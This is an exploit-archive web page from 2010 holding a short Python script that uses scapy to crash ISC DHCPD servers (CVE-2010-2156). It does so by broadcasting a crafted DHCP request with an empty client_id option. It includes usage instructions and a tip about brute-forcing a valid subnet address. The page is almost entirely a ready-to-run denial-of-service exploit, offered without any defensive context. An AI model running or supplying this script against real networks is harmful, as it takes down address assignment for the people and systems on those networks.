ISC-DHCPD Denial of Service
Posted on 03 July 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>ISC-DHCPD Denial of Service</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=========================== ISC-DHCPD Denial of Service =========================== #! /usr/bin/env python # Exploit title: isc-dhcpd DoS # Date: 03/07/2010 # Author: sid # Software Link: https://www.isc.org/software/dhcp # Version: 4.0.x, 4.1.x, 4.2.x # CVE: cve-2010-2156 # ps: is possible make a bruteforce on subnet ip address to find a correct value. # import sys import string if len(sys.argv) is 1: print("Usage: " + sys.argv[0] + "-ip=<legal ip in subnet>") print("Example: " + sys.argv[0] + " -ip=192.168.1.100") sys.exit(0) for i in range(len(sys.argv)): if string.find(sys.argv[i],"-ip") is 0: globals()['ip'] = sys.argv[i].split('=')[1] from scapy.all import * globals()['verbose'] = 2 def msg(string, level): if globals()['verbose'] >= level: print(string) msg("attack...",2) p=(Ether(src="aa:aa:aa:aa:aa:aa",dst="ff:ff:ff:ff:ff:ff")/IP(dst="255.255.255.255")/UDP(sport=68,dport=67)/ BOOTP(ciaddr=globals()['ip'],chaddr="xaaxaaxaaxaaxaaxaa")/ DHCP(options=[("message-type","request"),("client_id",""),("end")])) if p: p.show() sendp(p) #EOF # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-03]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
